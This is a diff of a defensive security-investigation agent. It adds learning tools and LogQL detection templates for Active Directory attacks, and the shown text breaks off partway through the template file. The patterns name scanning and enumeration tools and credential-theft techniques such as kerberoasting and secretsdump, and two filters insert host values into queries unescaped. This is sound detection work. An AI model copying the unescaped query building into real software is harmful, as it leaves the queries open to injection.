diff --git a/src/ares/reports/redteam.py b/src/ares/reports/redteam.py
index 507cce05..3d31e3e0 100644
--- a/src/ares/reports/redteam.py
+++ b/src/ares/reports/redteam.py
@@ -30,11 +30,9 @@ def generate(self, state: RedTeamState) -> str:
Returns:
Complete markdown report as a string.
"""
- # Calculate duration
duration = datetime.now(timezone.utc) - state.started_at
- duration_str = str(duration).split(".")[0] # Remove microseconds
+ duration_str = str(duration).split(".")[0]
- # Generate executive summary
executive_summary = self._generate_executive_summary(state)
# Render the report using the template
diff --git a/src/ares/tools/blue/__init__.py b/src/ares/tools/blue/__init__.py
index ccbf7e4e..52b04b47 100644
--- a/src/ares/tools/blue/__init__.py
+++ b/src/ares/tools/blue/__init__.py
@@ -3,14 +3,18 @@
from ares.tools.blue.actions import CompletionTools, escalate_investigation
from ares.tools.blue.grafana import GrafanaTools, connect_grafana_mcp
from ares.tools.blue.investigation import InvestigationTools, QuestionEngineTools
+from ares.tools.blue.learning import LearningTools
from ares.tools.blue.observability import LokiTools, PrometheusTools
+from ares.tools.blue.query_templates import QueryTemplateTools
__all__ = [
"CompletionTools",
"GrafanaTools",
"InvestigationTools",
+ "LearningTools",
"LokiTools",
"PrometheusTools",
+ "QueryTemplateTools",
"QuestionEngineTools",
"connect_grafana_mcp",
"escalate_investigation",
diff --git a/src/ares/tools/blue/actions.py b/src/ares/tools/blue/actions.py
index c9ff3711..d053ee93 100644
--- a/src/ares/tools/blue/actions.py
+++ b/src/ares/tools/blue/actions.py
@@ -26,130 +26,139 @@ def set_state(self, state: InvestigationState):
async def complete_investigation(
self,
summary: str,
- attack_synopsis: str,
- recommendations: list[str],
- confidence: str,
- affected_hosts: list[str],
- affected_users: list[str],
- attack_timeframe: str,
+ attack_synopsis: str | None = None,
+ recommendations: list[str] | None = None,
) -> str:
"""Complete the investigation and signal report generation.
- REQUIRED before calling:
- 1. Must have transitioned through lateral stage
- 2. Must have investigated at least one host
- 3. Must provide specific affected hosts/users
- 4. Must provide attack timeframe
+ Call this when you have:
+ - Answered the key questions about the alert
+ - Recorded evidence for your findings
+ - Built a timeline of events
+ - Identified affected hosts/users
Args:
- summary: Executive summary (2-3 sentences).
- attack_synopsis: Detailed description of the attack chain.
- recommendations: List of recommended actions.
- confidence: Overall confidence level (high/medium/low with explanation).
- affected_hosts: List of hosts involved in the attack (IPs or hostnames).
- affected_users: List of user accounts involved.
- attack_timeframe: Time range of the attack (e.g., "2024-01-15 14:30-15:45 UTC").
+ summary: Executive summary of the investigation including:
+ - What attack/activity was detected
+ - Key findings and evidence
+ - Affected hosts and users
+ - Confidence level (high/medium/low)
+ attack_synopsis: Narrative describing the attack chain chronologically.
+ Should include specific hostnames, usernames, IPs, and timestamps.
+ Explains how the attacker progressed through the attack.
+ recommendations: List of recommended actions to take. Should include
+ both immediate response actions and long-term improvements.
+ Check the alert's 'response' annotation for expert guidance.
Returns:
- Confirmation message or error if validation fails.
+ Confirmation message.
Example:
>>> await complete_investigation(
- ... summary="Detected Kerberoasting attack targeting service accounts.",
- ... attack_synopsis="Attacker performed AS-REP roasting against samwell.tarly...",
- ... recommendations=["Reset passwords for samwell.tarly and jeor.mormont"],
- ... confidence="High - Multiple corroborating Kerberos events",
- ... affected_hosts=["10.0.4.186", "WINTERFELL.north.sevenkingdoms.local"],
- ... affected_users=["samwell.tarly", "jeor.mormont"],
- ... attack_timeframe="2024-01-08 04:37-04:43 UTC"
+ ... summary="Detected Kerberoasting attack targeting service accounts. "
+ ... "User samwell.tarly requested TGS tickets with RC4 encryption "
+ ... "for multiple SPNs from host 10.0.4.186. Confidence: High.",
+ ... attack_synopsis="At 14:30 UTC, user samwell.tarly from 10.0.4.186 "
+ ... "began requesting TGS tickets for service accounts. "
+ ... "12 tickets requested with RC4 encryption over 5 minutes.",
+ ... recommendations=[
+ ... "Reset service account passwords immediately",
+ ... "Enable AES-only Kerberos encryption",
+ ... "Review service account permissions"
+ ... ]
... )
'Investigation completed. Report will be generated.'
"""
- errors = []
-
- # Validate state exists
if not self.state:
return "ERROR: No investigation state. Cannot complete."
- # Validate lateral investigation was performed
+ # Log stage info
if self.state.stage.value not in ["lateral", "synthesis"]:
- errors.append(
- f"ERROR: Must reach 'lateral' stage before completion. "
- f"Current stage: {self.state.stage.value}. "
- f"Call transition_stage('lateral') after investigating scope."
- )
-
- # Validate hosts were investigated
- if not self.state.queried_hosts and not affected_hosts:
- errors.append(
- "ERROR: No hosts investigated. Use track_host_investigation() "
- "to investigate affected hosts before completing."
- )
-
- # Validate affected_hosts is not empty
- if not affected_hosts:
- errors.append(
- "ERROR: affected_hosts is required. Provide the list of "
- "hosts/IPs involved in the attack."
- )
-
- # Validate affected_users is not empty
- if not affected_users:
- errors.append(
- "ERROR: affected_users is required. Provide the list of "
- "user accounts involved in the attack."
- )
-
- # Validate attack_timeframe is specific
- if not attack_timeframe or len(attack_timeframe) < 10:
- errors.append(
- "ERROR: attack_timeframe must be specific (e.g., '2024-01-08 04:37-04:43 UTC'). "
- "This should reflect the ACTUAL event timestamps from your investigation."
- )
-
- # Validate synopsis is substantive
- if len(attack_synopsis) < 100:
- errors.append(
- "ERROR: attack_synopsis too short. Provide a detailed description "
- "of the attack chain including: initial access, techniques used, "
- "and impact."
- )
-
- # Validate evidence was collected
- if len(self.state.evidence) < 2:
- errors.append(
- f"ERROR: Insufficient evidence ({len(self.state.evidence)} items). "
- "Continue investigation to gather more evidence."
- )
-
- # If errors, return them all
- if errors:
- dn.log_metric("completion_validation_failed", 1)
- return "\n\n".join(errors)
-
- # All validations passed
+ logger.info(f"Investigation completed at '{self.state.stage.value}' stage")
+
+ # Store attack synopsis if provided
+ if attack_synopsis:
+ self.state.attack_synopsis = attack_synopsis
+ logger.info(f"Attack synopsis recorded: {attack_synopsis[:100]}...")
+
+ # Process recommendations
+ if recommendations:
+ self.state.recommendations.extend(recommendations)
+ logger.info(f"Added {len(recommendations)} recommendations")
+
+ # Auto-extract recommendations from alert annotations if none provided
+ if not self.state.recommendations:
+ alert_annotations = self.state.alert.get("annotations", {})
+ response_guidance = alert_annotations.get("response", "")
+ if response_guidance:
+ import re
+
+ steps = re.split(r"\d+\.\s+", response_guidance)
+ extracted_recs = [s.strip() for s in steps if s.strip()]
+ if extracted_recs:
+ self.state.recommendations.extend(extracted_recs)
+ logger.info(f"Auto-extracted {len(extracted_recs)} recommendations from alert")
+
+ # Auto-generate synopsis if not provided and we have evidence
+ if not self.state.attack_synopsis and self.state.evidence:
+ self._generate_fallback_synopsis()
+
+ # Record completion
dn.log_metric("investigation_completed", 1)
dn.log_output(
"completion_summary",
{
"summary": summary,
- "attack_synopsis": attack_synopsis,
- "recommendations": recommendations,
- "confidence": confidence,
- "affected_hosts": affected_hosts,
- "affected_users": affected_users,
- "attack_timeframe": attack_timeframe,
+ "attack_synopsis": self.state.attack_synopsis,
+ "recommendations": self.state.recommendations,
"evidence_count": len(self.state.evidence),
"timeline_events": len(self.state.timeline),
"hosts_investigated": list(self.state.queried_hosts),
"users_investigated": list(self.state.queried_users),
+ "techniques_identified": list(self.state.identified_techniques),
},
)
- logger.success("Investigation completed")
+ logger.success(f"Investigation completed: {summary[:100]}...")
return "Investigation completed. Report will be generated."
+    def _generate_fallback_synopsis(self) -> None:
+        """Build a basic synopsis from the investigation state if none was provided.
+
+        Writes the result to ``self.state.attack_synopsis``. Does nothing when
+        there is no state. The text is assembled from the alert labels, the
+        alert start time, and up to three techniques, hosts and users each,
+        followed by evidence counts.
+        """
+        state = self.state
+        if not state:
+            return
+
+        labels = state.alert.get("labels", {})
+        alert_name = labels.get("alertname", "Unknown alert")
+        severity = labels.get("severity", "unknown")
+        starts_at = state.alert.get("startsAt", "")
+
+        # Terminate the headline like every other sentence so the joined
+        # synopsis does not run into "Alert triggered at ...".
+        parts = [f"{severity.upper()} alert: {alert_name}."]
+
+        if starts_at:
+            parts.append(f"Alert triggered at {starts_at}.")
+
+        # Sort before truncating: slicing an unordered collection directly
+        # would make the synopsis differ between otherwise identical runs.
+        if state.identified_techniques:
+            techniques = ", ".join(sorted(state.identified_techniques)[:3])
+            parts.append(f"MITRE techniques identified: {techniques}.")
+
+        if state.queried_hosts:
+            hosts = ", ".join(sorted(state.queried_hosts)[:3])
+            parts.append(f"Hosts involved: {hosts}.")
+
+        if state.queried_users:
+            users = ", ".join(sorted(state.queried_users)[:3])
+            parts.append(f"Users involved: {users}.")
+
+        if state.evidence:
+            parts.append(f"{len(state.evidence)} evidence items collected.")
+            # Pyramid level 5 and above is reported as tools/TTPs.
+            high_level = [e for e in state.evidence if e.pyramid_level.value >= 5]
+            if high_level:
+                parts.append(f"{len(high_level)} high-value indicators (tools/TTPs) identified.")
+
+        state.attack_synopsis = " ".join(parts)
+
@dn.tool() # type: ignore[untyped-decorator]
async def escalate_investigation(
diff --git a/src/ares/tools/blue/grafana.py b/src/ares/tools/blue/grafana.py
index bde0bee1..c466f3d9 100644
--- a/src/ares/tools/blue/grafana.py
+++ b/src/ares/tools/blue/grafana.py
@@ -4,6 +4,7 @@
import shutil
import subprocess # nosec B404
from pathlib import Path
+from typing import Any
import dreadnode as dn
import httpx
@@ -130,7 +131,7 @@ def find_mcp_grafana() -> str:
async def connect_grafana_mcp(
grafana_url: str | None = None,
grafana_api_key: str | None = None,
-): # type: ignore[no-untyped-def]
+) -> Any:
"""
Connect to Grafana MCP server via Rigging.
diff --git a/src/ares/tools/blue/investigation.py b/src/ares/tools/blue/investigation.py
index 187ed394..3dd7f841 100644
--- a/src/ares/tools/blue/investigation.py
+++ b/src/ares/tools/blue/investigation.py
@@ -32,14 +32,20 @@ class InvestigationTools(Toolset): # type: ignore[misc]
Attributes:
state: Current investigation state being managed.
+ mitre_client: MITRE ATT&CK client for technique lookups.
"""
state: InvestigationState | None = None
+ mitre_client: MITREAttackClient | None = None
def set_state(self, state: InvestigationState):
"""Set the investigation state (called by orchestrator)."""
self.state = state
+    def set_mitre_client(self, client: MITREAttackClient):
+        """Store the MITRE ATT&CK client on this toolset.
+
+        Args:
+            client: Client assigned to ``self.mitre_client``. While it is unset,
+                ``_resolve_technique_metadata`` returns without doing lookups.
+        """
+        self.mitre_client = client
+
@dn.tool_method # type: ignore[untyped-decorator]
def record_evidence(
self,
@@ -116,6 +122,8 @@ def record_evidence(
if mitre_techniques:
self.state.identified_techniques.update(mitre_techniques)
+ # Look up technique names and tactics
+ self._resolve_technique_metadata(mitre_techniques)
dn.log_output(f"evidence_{evidence_id}", ev.to_dict())
dn.log_metric("evidence_count", 1, mode="count")
@@ -127,6 +135,24 @@ def record_evidence(
return evidence_id
+    def _resolve_technique_metadata(self, technique_ids: list[str]) -> None:
+        """Record name and tactic for every technique ID that is not cached yet.
+
+        Returns immediately when either the investigation state or the MITRE
+        client is missing. IDs the client cannot find are left untouched.
+        """
+        if not (self.state and self.mitre_client):
+            return
+
+        state = self.state
+        for tech_id in technique_ids:
+            already_known = tech_id in state.technique_names
+            if already_known:
+                continue
+
+            technique = self.mitre_client.get_technique(tech_id)
+            if not technique:
+                continue
+
+            state.technique_names[tech_id] = technique.name
+            # An empty tactic is stored as "Unknown" and not added to the tactic set.
+            state.technique_to_tactic[tech_id] = technique.tactic if technique.tactic else "Unknown"
+            if technique.tactic:
+                state.identified_tactics.add(technique.tactic)
+            logger.debug(f"Resolved technique {tech_id}: {technique.name} ({technique.tactic})")
+
@dn.tool_method # type: ignore[untyped-decorator]
def add_timeline_event(
self,
diff --git a/src/ares/tools/blue/learning.py b/src/ares/tools/blue/learning.py
new file mode 100644
index 00000000..accc04d9
--- /dev/null
+++ b/src/ares/tools/blue/learning.py
@@ -0,0 +1,343 @@
+"""
+Learning tools for querying past investigations and improving detection.
+
+These tools allow the agent to learn from previous investigations
+and apply that knowledge to new alerts.
+"""
+
+from typing import Any
+
+import dreadnode as dn
+from dreadnode.agent.tools.base import Toolset
+from loguru import logger
+
+from ares.core.persistence import InvestigationStore, get_investigation_store
+
+
+class LearningTools(Toolset):  # type: ignore[misc]
+    """Tools for learning from past investigations.
+
+    Provides access to historical investigation data, query effectiveness
+    statistics, and false positive patterns.
+
+    Attributes:
+        store: Optional investigation store (uses global store if not provided).
+    """
+
+    store: InvestigationStore | None = None
+
+    def get_store(self) -> InvestigationStore:
+        """Get the investigation store, initializing if needed."""
+        if self.store is None:
+            self.store = get_investigation_store()
+        return self.store
+
+    @dn.tool_method  # type: ignore[untyped-decorator]
+    async def find_similar_investigations(
+        self,
+        alert_name: str | None = None,
+        technique_id: str | None = None,
+        severity: str | None = None,
+        limit: int = 5,
+    ) -> dict[str, Any]:
+        """Find similar past investigations to learn from.
+
+        Use this at the start of an investigation to see how similar alerts
+        were handled in the past and what queries were effective.
+
+        Args:
+            alert_name: Name of the current alert
+            technique_id: MITRE ATT&CK technique ID (e.g., "T1003.001")
+            severity: Alert severity level
+            limit: Maximum number of results (default 5)
+
+        Returns:
+            Dictionary containing similar investigations and their outcomes
+        """
+        dn.log_metric("learning_similar_lookup", 1, mode="count")
+        logger.info(
+            f"Looking up similar investigations: alert={alert_name}, technique={technique_id}"
+        )
+
+        similar = self.get_store().find_similar_investigations(
+            alert_name=alert_name,
+            technique_id=technique_id,
+            severity=severity,
+            limit=limit,
+        )
+
+        if not similar:
+            return {
+                "found": False,
+                "message": "No similar investigations found. This may be a new alert type.",
+                "investigations": [],
+            }
+
+        results = []
+        for sim in similar:
+            inv = sim.investigation
+            results.append(
+                {
+                    "investigation_id": inv.investigation_id,
+                    "alert_name": inv.alert_name,
+                    "technique_id": inv.technique_id,
+                    "similarity_score": sim.similarity_score,
+                    "matching_factors": sim.matching_factors,
+                    "outcome": {
+                        "status": inv.status,
+                        "evidence_count": inv.evidence_count,
+                        "highest_pyramid_level": inv.highest_pyramid_level,
+                        "is_true_positive": inv.is_true_positive,
+                    },
+                    "duration_seconds": inv.duration_seconds,
+                    "effective_queries": inv.effective_queries[:3],  # Top 3 effective queries
+                    "techniques_identified": inv.techniques_identified,
+                }
+            )
+
+        # Add summary guidance
+        completed_count = sum(1 for s in similar if s.investigation.status == "completed")
+        avg_evidence = sum(s.investigation.evidence_count for s in similar) / len(similar)
+
+        # Investigations whose label is None (unlabeled) fall into neither count.
+        true_positive_count = sum(1 for s in similar if s.investigation.is_true_positive is True)
+        false_positive_count = sum(1 for s in similar if s.investigation.is_true_positive is False)
+
+        return {
+            "found": True,
+            "count": len(results),
+            "summary": {
+                "completion_rate": f"{completed_count / len(similar) * 100:.0f}%",
+                "avg_evidence_count": round(avg_evidence, 1),
+                "true_positives": true_positive_count,
+                "false_positives": false_positive_count,
+            },
+            "investigations": results,
+            "guidance": self._generate_guidance(similar),
+        }
+
+    @dn.tool_method  # type: ignore[untyped-decorator]
+    async def get_effective_queries(
+        self,
+        alert_name: str | None = None,
+        limit: int = 10,
+    ) -> dict[str, Any]:
+        """Get the most effective queries for this type of alert.
+
+        Returns queries that have historically produced evidence,
+        ranked by effectiveness.
+
+        Args:
+            alert_name: Filter by alert type (optional)
+            limit: Maximum number of queries to return
+
+        Returns:
+            Dictionary with effective queries and their statistics
+        """
+        dn.log_metric("learning_query_lookup", 1, mode="count")
+        logger.info(f"Looking up effective queries for alert: {alert_name}")
+
+        effective = self.get_store().get_effective_queries(
+            alert_type=alert_name,
+            min_evidence_rate=0.2,  # At least 20% evidence rate
+            limit=limit,
+        )
+
+        if not effective:
+            return {
+                "found": False,
+                "message": "No query effectiveness data available yet.",
+                "queries": [],
+            }
+
+        queries = []
+        for qe in effective:
+            queries.append(
+                {
+                    "query_pattern": qe.query_pattern,
+                    "total_uses": qe.total_executions,
+                    "success_rate": f"{qe.success_rate * 100:.0f}%",
+                    "evidence_rate": f"{qe.evidence_rate * 100:.0f}%",
+                    "used_for_alerts": qe.alert_types[:5],  # Limit alert types shown
+                }
+            )
+
+        return {
+            "found": True,
+            "count": len(queries),
+            "queries": queries,
+            "recommendation": (
+                "Use these queries as starting points. They have historically "
+                "produced evidence for similar alerts. Adapt the patterns to "
+                "your specific investigation context."
+            ),
+        }
+
+    @dn.tool_method  # type: ignore[untyped-decorator]
+    async def check_false_positive_pattern(
+        self,
+        alert_name: str,
+        alert_fingerprint: str | None = None,
+    ) -> dict[str, Any]:
+        """Check if this alert matches a known false positive pattern.
+
+        Use this to quickly identify if an alert is likely a false positive
+        based on historical data.
+
+        Args:
+            alert_name: Name of the alert
+            alert_fingerprint: Unique fingerprint/rule UID of the alert
+
+        Returns:
+            Dictionary with false positive assessment
+        """
+        dn.log_metric("learning_fp_check", 1, mode="count")
+        logger.info(f"Checking false positive patterns for: {alert_name}")
+
+        # Check for similar false positives
+        similar = self.get_store().find_similar_investigations(
+            alert_name=alert_name,
+            alert_fingerprint=alert_fingerprint,
+            limit=20,
+        )
+
+        if not similar:
+            return {
+                "is_known_pattern": False,
+                "message": "No historical data for this alert type.",
+                "confidence": "low",
+            }
+
+        # Count true/false positives
+        true_positives = sum(1 for s in similar if s.investigation.is_true_positive is True)
+        false_positives = sum(1 for s in similar if s.investigation.is_true_positive is False)
+        unlabeled = len(similar) - true_positives - false_positives
+
+        # Calculate false positive likelihood over labeled investigations only
+        if true_positives + false_positives > 0:
+            fp_rate = false_positives / (true_positives + false_positives)
+        else:
+            fp_rate = 0.0
+
+        # Check known FP patterns
+        fp_patterns = self.get_store().get_false_positive_patterns(min_occurrences=2)
+        matching_pattern = None
+        for pattern in fp_patterns:
+            if pattern["alert_name"] == alert_name:
+                matching_pattern = pattern
+                break
+
+        if matching_pattern and matching_pattern["occurrences"] >= 3:
+            return {
+                "is_known_pattern": True,
+                "confidence": "high",
+                "false_positive_rate": f"{fp_rate * 100:.0f}%",
+                "occurrences": matching_pattern["occurrences"],
+                "pattern": matching_pattern,
+                "recommendation": (
+                    "This alert has been marked as false positive multiple times. "
+                    "Consider quick validation and early completion if indicators match."
+                ),
+            }
+
+        if fp_rate > 0.7:
+            return {
+                "is_known_pattern": True,
+                "confidence": "medium",
+                "false_positive_rate": f"{fp_rate * 100:.0f}%",
+                "true_positives": true_positives,
+                "false_positives": false_positives,
+                "recommendation": (
+                    "This alert type has a high false positive rate. "
+                    "Prioritize quick validation queries before deep investigation."
+                ),
+            }
+
+        return {
+            "is_known_pattern": False,
+            # Confidence drops to "low" when at least half the history is unlabeled.
+            "confidence": "medium" if unlabeled < len(similar) / 2 else "low",
+            "false_positive_rate": f"{fp_rate * 100:.0f}%",
+            "true_positives": true_positives,
+            "false_positives": false_positives,
+            "unlabeled": unlabeled,
+            "message": "No strong false positive pattern detected. Proceed with normal investigation.",
+        }
+
+    @dn.tool_method  # type: ignore[untyped-decorator]
+    async def get_investigation_statistics(self) -> dict[str, Any]:
+        """Get overall investigation statistics.
+
+        Returns aggregated statistics about past investigations,
+        useful for understanding overall detection performance.
+
+        Returns:
+            Dictionary with investigation statistics
+        """
+        dn.log_metric("learning_stats_lookup", 1, mode="count")
+
+        stats = self.get_store().get_statistics()
+
+        return {
+            "total_investigations": stats["total_investigations"],
+            "status_distribution": stats["status_distribution"],
+            "performance": {
+                "avg_evidence_count": stats["avg_evidence_count"],
+                "avg_pyramid_level": stats["avg_pyramid_level"],
+                "avg_duration_seconds": stats["avg_duration_seconds"],
+            },
+            "query_insights": {
+                "total_query_patterns": stats["total_query_patterns"],
+                "avg_evidence_rate": f"{stats['avg_query_evidence_rate']}%",
+            },
+            "labeling": stats["labeling"],
+        }
+
+    def _generate_guidance(self, similar: list) -> str:
+        """Generate investigation guidance based on similar investigations.
+
+        Args:
+            similar: Similar-investigation results; each item exposes an
+                ``investigation`` with ``status``, ``evidence_count``,
+                ``effective_queries`` and ``is_true_positive``.
+
+        Returns:
+            A short guidance string, or a fixed fallback sentence when there is
+            no history, no completed investigation, or nothing worth saying.
+        """
+        if not similar:
+            return "No historical guidance available."
+
+        # Find most successful investigation
+        completed = [s for s in similar if s.investigation.status == "completed"]
+        if not completed:
+            return "Previous investigations of this type did not complete successfully."
+
+        # Get investigation with most evidence
+        best = max(completed, key=lambda x: x.investigation.evidence_count)
+
+        guidance_parts = []
+
+        if best.investigation.evidence_count > 0:
+            guidance_parts.append(
+                f"Past investigations found an average of "
+                f"{sum(s.investigation.evidence_count for s in completed) / len(completed):.1f} "
+                f"evidence items."
+            )
+
+        if best.investigation.effective_queries:
+            guidance_parts.append(
+                f"Effective queries to try: {', '.join(best.investigation.effective_queries[:2])}"
+            )
+
+        # Check for common outcomes. Only labeled investigations count toward
+        # the rate: treating unlabeled ones as "not true positive" would report
+        # a 0% true positive rate for history that was simply never labeled.
+        true_positive_count = sum(1 for s in similar if s.investigation.is_true_positive is True)
+        false_positive_count = sum(1 for s in similar if s.investigation.is_true_positive is False)
+        labeled_count = true_positive_count + false_positive_count
+
+        if labeled_count > 0:
+            true_positive_rate = true_positive_count / labeled_count * 100
+
+            if true_positive_rate > 70:
+                guidance_parts.append(
+                    f"This alert type has a {true_positive_rate:.0f}% true positive rate - "
+                    "likely worth thorough investigation."
+                )
+            elif true_positive_rate < 30:
+                guidance_parts.append(
+                    f"This alert type has only a {true_positive_rate:.0f}% true positive rate - "
+                    "consider quick validation first."
+                )
+
+        return (
+            " ".join(guidance_parts)
+            if guidance_parts
+            else "Proceed with standard investigation approach."
+        )
diff --git a/src/ares/tools/blue/observability.py b/src/ares/tools/blue/observability.py
index 8c405ddf..380aa3a5 100644
--- a/src/ares/tools/blue/observability.py
+++ b/src/ares/tools/blue/observability.py
@@ -76,7 +76,6 @@ async def query_logs(
query_logs_around_timestamp: For time-window queries around a specific event.
get_label_values: For discovering available log labels.
"""
- # Validate query to prevent empty-compatible regex errors
if '=~".*"' in logql or "=~'.*'" in logql:
return {
"status": "error",
@@ -109,7 +108,6 @@ async def query_logs(
except httpx.HTTPError as e:
logger.error(f"Loki query failed: {e}")
logger.error(f"Failed query was: {logql}")
- # Return detailed error for the agent to learn from
return {
"status": "error",
"error": str(e),
@@ -185,7 +183,6 @@ async def query_logs_progressive(
limit=limit,
)
- # Check if we got results
data = result.get("data", {})
results = data.get("result", [])
if results:
diff --git a/src/ares/tools/blue/query_templates.py b/src/ares/tools/blue/query_templates.py
new file mode 100644
index 00000000..105f0738
--- /dev/null
+++ b/src/ares/tools/blue/query_templates.py
@@ -0,0 +1,1966 @@
+"""Pre-built query templates for detecting red team attack patterns.
+
+Provides ready-to-use LogQL queries mapped to MITRE ATT&CK techniques,
+specifically designed to detect attacks performed by the Ares red team agent.
+"""
+
+from datetime import datetime, timedelta, timezone
+from typing import Any
+
+import dreadnode as dn
+import httpx
+from dreadnode.agent.tools.base import Toolset
+from loguru import logger
+
+
+class QueryTemplateTools(Toolset): # type: ignore[misc]
+ """Pre-built query templates for detecting red team attack patterns.
+
+ These templates encode detection logic for Active Directory attacks,
+ specifically aligned with the techniques used by the Ares red team agent:
+ - Network enumeration (nmap, user/share enumeration)
+ - Credential access (secretsdump, kerberoasting, AS-REP roasting)
+ - Lateral movement (pass-the-hash, psexec, wmi)
+ - Privilege escalation (ADCS, delegation, golden ticket)
+
+ Attributes:
+ loki_url: Base URL of the Loki instance.
+ timeout: HTTP request timeout in seconds.
+ """
+
+ loki_url: str
+ timeout: int = 30
+
+    async def _query_loki(
+        self,
+        logql: str,
+        start_time: str,
+        end_time: str,
+        limit: int = 500,
+    ) -> dict[str, Any]:
+        """Run a LogQL range query against Loki's ``query_range`` endpoint.
+
+        Args:
+            logql: The LogQL expression to execute.
+            start_time: Start of the query window, sent as the ``start`` parameter.
+            end_time: End of the query window, sent as the ``end`` parameter.
+            limit: Maximum number of entries requested from Loki.
+
+        Returns:
+            The decoded JSON body on success. On every failure path a dict with
+            ``status`` set to "error", an ``error`` message and an empty
+            ``data.result`` list, so callers can treat all outcomes uniformly.
+        """
+        # Reject matchers that can match the empty string before sending them.
+        if '=~".*"' in logql or "=~'.*'" in logql:
+            return {
+                "status": "error",
+                "error": "Query contains empty-compatible regex '.*'. Use '.+' instead.",
+                "data": {"result": []},
+            }
+
+        try:
+            async with httpx.AsyncClient(timeout=self.timeout) as client:
+                response = await client.get(
+                    f"{self.loki_url}/loki/api/v1/query_range",
+                    params={
+                        "query": logql,
+                        "start": start_time,
+                        "end": end_time,
+                        "limit": limit,
+                    },
+                )
+                response.raise_for_status()
+                return response.json()
+        except httpx.HTTPError as e:
+            logger.error(f"Loki query failed: {e}")
+            return {"status": "error", "error": str(e), "data": {"result": []}}
+        except ValueError as e:
+            # response.json() raises a ValueError subclass when the body is not
+            # valid JSON (e.g. an HTML error page served by a proxy).
+            logger.error(f"Loki returned a non-JSON response: {e}")
+            return {"status": "error", "error": str(e), "data": {"result": []}}
+
+    def _get_time_range(self, hours_back: int = 24) -> tuple[str, str]:
+        """Build the (start, end) query window that ends at the current UTC time.
+
+        Args:
+            hours_back: Length of the window in hours.
+
+        Returns:
+            Two ISO 8601 strings: the window start and the window end.
+        """
+        window_end = datetime.now(timezone.utc)
+        window_start = window_end - timedelta(hours=hours_back)
+        return window_start.isoformat(), window_end.isoformat()
+
+    def _count_results(self, result: dict) -> int:
+        """Return how many log entries the response holds across all streams.
+
+        Missing ``data``, ``result`` or ``values`` keys count as empty.
+        """
+        total = 0
+        for stream in result.get("data", {}).get("result", []):
+            total += len(stream.get("values", []))
+        return total
+
+ # =========================================================================
+ # RECONNAISSANCE & DISCOVERY (TA0007)
+ # Maps to: nmap_scan, enumerate_users, enumerate_shares
+ # =========================================================================
+
+    @dn.tool_method  # type: ignore[untyped-decorator]
+    async def detect_port_scanning(
+        self,
+        target_ip: str | None = None,
+        hours_back: int = 24,
+    ) -> dict[str, Any]:
+        """Detect network port scanning activity (nmap, masscan).
+
+        Detects reconnaissance performed by red team's nmap_scan tool.
+        Looks for scanner names, scan keywords and refused connections.
+
+        MITRE ATT&CK: T1046 (Network Service Discovery)
+
+        Args:
+            target_ip: Optional IP to focus detection on. It is matched
+                literally; regex metacharacters in it have no special meaning.
+            hours_back: Hours of logs to search (default 24).
+
+        Returns:
+            The Loki response annotated with ``_query_template``,
+            ``_mitre_technique`` and ``_red_team_tool``.
+        """
+        import json
+        import re
+
+        dn.log_metric("query_template_port_scan", 1, mode="count")
+        start_time, end_time = self._get_time_range(hours_back)
+
+        # Detect nmap signatures, SYN scans, rapid connection attempts
+        logql = '{job=~".+"} |~ "(?i)(nmap|masscan|syn.*scan|port.*scan|connection.*refused)"'
+
+        if target_ip:
+            # re.escape keeps the dots of the address literal instead of
+            # "any character". json.dumps then renders the pattern as a
+            # double-quoted string with backslashes and quotes escaped, which is
+            # what a double-quoted LogQL string requires, so the value cannot
+            # terminate the filter early or produce an invalid escape.
+            logql += f" |~ {json.dumps(re.escape(target_ip), ensure_ascii=False)}"
+
+        logger.info(f"Port scanning detection: {logql}")
+
+        result = await self._query_loki(logql, start_time, end_time, limit=500)
+        result["_query_template"] = "port_scanning"
+        result["_mitre_technique"] = "T1046"
+        result["_red_team_tool"] = "nmap_scan"
+
+        return result
+
+    @dn.tool_method  # type: ignore[untyped-decorator]
+    async def detect_user_enumeration(
+        self,
+        domain_controller: str | None = None,
+        hours_back: int = 24,
+    ) -> dict[str, Any]:
+        """Search logs for Active Directory account enumeration.
+
+        Targets the activity of the red team's enumerate_users tool
+        (netexec --users): LDAP queries, net user commands and SMB-based lookups.
+
+        MITRE ATT&CK: T1087.002 (Account Discovery: Domain Account)
+
+        Args:
+            domain_controller: When given, the stream selector is narrowed to
+                hostname labels containing this value.
+            hours_back: Size of the search window in hours.
+
+        Returns:
+            The Loki response annotated with the template name, technique ID
+            and the red team tool this detection maps to.
+        """
+        dn.log_metric("query_template_user_enum", 1, mode="count")
+        window_start, window_end = self._get_time_range(hours_back)
+
+        selector = '{job=~".+"}'
+        if domain_controller:
+            selector = f'{{job=~".+", hostname=~".*{domain_controller}.*"}}'
+
+        # First stage: event IDs 4662 (object access / LDAP queries), 4798 and
+        # 4799 (group membership enumerated) plus RPC/LDAP/net command names.
+        # Second stage: enumeration verbs and netexec/crackmapexec/ldapsearch.
+        logql = " |~ ".join(
+            [
+                selector,
+                '"(?i)(4662|4798|4799|samr|lsarpc|ldap|net.*user|net.*group)"',
+                '"(?i)(enumerate|query|lookup|search|crackmapexec|netexec|ldapsearch)"',
+            ]
+        )
+
+        logger.info(f"User enumeration detection: {logql}")
+
+        response = await self._query_loki(logql, window_start, window_end, limit=500)
+        response.update(
+            {
+                "_query_template": "user_enumeration",
+                "_mitre_technique": "T1087.002",
+                "_red_team_tool": "enumerate_users",
+            }
+        )
+        return response
+
+    @dn.tool_method  # type: ignore[untyped-decorator]
+    async def detect_share_enumeration(
+        self,
+        target_host: str | None = None,
+        hours_back: int = 24,
+    ) -> dict[str, Any]:
+        """Search logs for SMB share enumeration.
+
+        Targets the activity of the red team's enumerate_shares tool
+        (netexec --shares): share listing, access attempts and smbclient use.
+
+        MITRE ATT&CK: T1135 (Network Share Discovery)
+
+        Args:
+            target_host: When given, an extra case-insensitive line filter on
+                this value is appended to the query.
+            hours_back: Size of the search window in hours.
+
+        Returns:
+            The Loki response annotated with the template name, technique ID
+            and the red team tool this detection maps to.
+        """
+        dn.log_metric("query_template_share_enum", 1, mode="count")
+        window_start, window_end = self._get_time_range(hours_back)
+
+        # Stage one: event IDs 5140 (share accessed) and 5145 (detailed file
+        # share access) plus share-related command names.
+        # Stage two: smbclient / netexec style tool signatures.
+        stages = [
+            '{job=~".+"}',
+            '"(?i)(5140|5145|srvsvc|netuse|net.*share|net.*view)"',
+            '"(?i)(smbclient|crackmapexec|netexec|enum.*share|share.*enum)"',
+        ]
+        if target_host:
+            stages.append(f'"(?i){target_host}"')
+        logql = " |~ ".join(stages)
+
+        logger.info(f"Share enumeration detection: {logql}")
+
